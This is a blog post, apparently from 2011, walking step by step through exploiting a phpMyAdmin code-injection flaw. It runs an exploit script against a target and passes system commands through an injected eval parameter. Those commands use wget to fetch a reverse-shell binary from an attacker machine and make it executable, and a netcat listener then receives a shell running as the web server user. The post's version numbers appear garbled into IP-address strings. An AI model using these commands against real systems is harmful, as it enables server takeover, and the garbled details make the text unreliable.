Friday, 5 August 2011
phpMyAdmin Prior to 184.108.40.206 and 220.127.116.11 Multiple Remote Vulnerabilities
Bugtraq ID: 48563
Class: Input Validation Error
Published: Jul 05 2011 12:00AM
Updated: Jul 26 2011 10:10PM
URL : http://www.securityfocus.com/bid/48563/info
Hello all, this post will be a mix with an old post that I already did wish was "Deface using EVAL() function" + phpmyadmin Prior to 18.104.22.168 and 22.214.171.124.
PhpMyAdmin is prone to multiple remote vulnerabilities, including PHP code-execution and local file-include vulnerabilities.Successful attacks can compromise the affected application and possibly the underlying computer. So, lets test that. We have 2 exploits available.With the first one, we will make the eval option available for us to execute remote commands on the target machine.
php exploit1.php http://172.16.1.18/phpmyadmin
You should get something like this
[*] Contacting server to retrive session cookie and token.
[*] Contacting server to inject code into the _SESSION[ConfigFile][Servers] array.
[*] Contacting server to make it save the injected code to a file.
[*] Contacting server to test if the injected code executes.
[!] Code injection successfull. This instance of phpMyAdmin is vulnerable!
[+] Use your browser to execute PHP code like this
Great, that means it worked.
Now we apply what I explained before about EVAL().
Before you type all the commands, make sure your attacking server is ready for the reverse connection from the target machine. Type this in the attacking server:
nc -l -p 8080 -vvv
Ok, now lets go back to the browser and upload our shell to the server.
http://172.16.1.18/phpmyadmin/config/config.inc.php?eval=system("ls -la /");
http://172.16.1.18/phpmyadmin/config/config.inc.php?eval=system("wget -P /tmp http://172.16.1.79/exploits/airwolf_reverse_shell");
http://172.16.1.18/phpmyadmin/config/config.inc.php?eval=system("chmod 777 /tmp/airwolf_reverse_shell");
After you typed this last line, you go to the attacking server shell to see if the target server connected to you.
listening on [any] 8080 ...
172.16.1.18: inverse host lookup failed: Unknown server error : Connection timed out
connect to [172.16.1.79] from (UNKNOWN) [172.16.1.18] 53365
uid=48(apache) gid=48(apache) groups=48(apache)
Yeap, as you can see got our shell in the server.
Have fun ;)